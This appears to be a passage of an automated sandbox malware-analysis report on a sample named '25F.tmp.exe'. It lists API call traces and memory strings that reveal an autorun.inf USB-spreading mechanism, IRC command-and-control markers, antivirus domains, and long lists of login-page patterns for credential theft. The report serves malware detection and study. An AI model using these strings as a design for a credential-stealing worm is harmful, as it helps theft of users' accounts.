            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 35_2_00151EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,35_2_00151EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 35_2_00158B30 memset,EncryptMessage,35_2_00158B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 36_2_007F1EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,36_2_007F1EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 36_2_007F8C90 memset,WSAGetLastError,DecryptMessage,36_2_007F8C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 36_2_007F8B30 memset,EncryptMessage,36_2_007F8B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 37_2_00251EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,37_2_00251EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 37_2_00258C90 memset,WSAGetLastError,DecryptMessage,37_2_00258C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 37_2_00258B30 memset,EncryptMessage,37_2_00258B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 38_2_00261EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,38_2_00261EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 38_2_00268C90 memset,WSAGetLastError,DecryptMessage,38_2_00268C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 38_2_00268B30 memset,EncryptMessage,38_2_00268B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 39_2_003F1EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,39_2_003F1EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 39_2_003F8C90 memset,WSAGetLastError,DecryptMessage,39_2_003F8C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 39_2_003F8B30 memset,EncryptMessage,39_2_003F8B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 40_2_003F1EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,40_2_003F1EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 40_2_003F8C90 memset,WSAGetLastError,DecryptMessage,40_2_003F8C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 40_2_003F8B30 memset,EncryptMessage,40_2_003F8B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 41_2_00281EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,41_2_00281EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 41_2_00288C90 memset,WSAGetLastError,DecryptMessage,41_2_00288C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 41_2_00288B30 memset,EncryptMessage,41_2_00288B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 42_2_00108C90 memset,WSAGetLastError,DecryptMessage,42_2_00108C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 42_2_00101EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,42_2_00101EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 42_2_00108B30 memset,EncryptMessage,42_2_00108B30

            Compliance

            barindex
            Source: C:\Users\user\Desktop\25F.tmp.exe  Unpacked PE file: 2.2.25F.tmp.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\25F.tmp.exe  Unpacked PE file: 4.2.25F.tmp.exe.360000.0.unpack
            Source: C:\Users\user\Desktop\25F.tmp.exe  Unpacked PE file: 4.2.25F.tmp.exe.400000.1.unpack
            Source: 25F.tmp.exe  Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe  File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
            Source: unknown  HTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.22:49181 version: TLS 1.2
            Source: unknown  HTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.22:49180 version: TLS 1.2
            Source: unknown  HTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.22:49175 version: TLS 1.2
            Source: unknown  HTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.22:49174 version: TLS 1.2
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QgGhoOpxHPl.exe, 00000009.00000002.624007678.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000A.00000002.623894475.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000B.00000002.624028617.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000C.00000002.624002687.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000D.00000002.623566344.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000E.00000002.624079839.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000F.00000002.623632104.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000010.00000002.623656498.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000011.00000000.386197187.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000012.00000002.623647954.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000013.00000002.623981000.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000014.00000000.387583156.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000015.00000002.623920086.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000016.00000002.623820405.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000017.00000000.391050949.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000019.00000002.623538208.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001A.00000000.391969074.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001B.00000000.392217468.000000000123E000.00000002.00000001.01000000.00000005.sdmp, 
QgGhoOpxHPl.exe, 0000001D.00000000.392771743.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001E.00000002.623775125.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001F.00000000.393702318.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000020.00000000.394071706.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000021.00000000.394366434.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000022.00000000.394702338.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000023.00000000.394946970.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000024.00000000.395128308.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000025.00000002.623951188.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000026.00000000.395491250.000000000123E000.00000002.00000001.01000000.00000005.sdmp, Qg
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 10_2_0018FB60 RegisterClassExA,CreateWindowExA,RegisterDeviceNotificationA,GetMessageA,GetMessageA,TranslateMessage,TranslateMessage,DispatchMessageA,GetMessageA  10_2_0018FB60
            Source: 25F.tmp.exe, 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp  Binary or memory string: [autorun]
            Source: 25F.tmp.exe, 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp  Binary or memory string: %sautorun.inf
            Source: 25F.tmp.exe, 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 
'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: 25F.tmp.exe, 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp  Binary or memory string: shellexecute=[autorun]
            Source: 25F.tmp.exe, 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: 25F.tmp.exe  Binary or memory string: %sautorun.inf
            Source: 25F.tmp.exe  Binary or memory string: [autorun]
            Source: 25F.tmp.exe  Binary or memory string: autorun.inf
            Source: 25F.tmp.exe, 00000004.00000003.399212621.00000000007DF000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: [autorun]
            Source: 25F.tmp.exe, 00000004.00000003.399212621.00000000007DF000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: %sautorun.inf
            Source: 25F.tmp.exe, 00000004.00000003.399212621.00000000007DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 
'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: 25F.tmp.exe, 00000004.00000003.399212621.00000000007DF000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: shellexecute=[autorun]
            Source: 25F.tmp.exe, 00000004.00000003.399212621.00000000007DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: 25F.tmp.exe, 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp  Binary or memory string: [autorun]
            Source: 25F.tmp.exe, 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp  Binary or memory string: %sautorun.inf
            Source: 25F.tmp.exe, 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 
'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: 25F.tmp.exe, 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp  Binary or memory string: shellexecute=[autorun]
            Source: 25F.tmp.exe, 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: 25F.tmp.exe, 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp  Binary or memory string: [autorun]
            Source: 25F.tmp.exe, 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp  Binary or memory string: %sautorun.inf
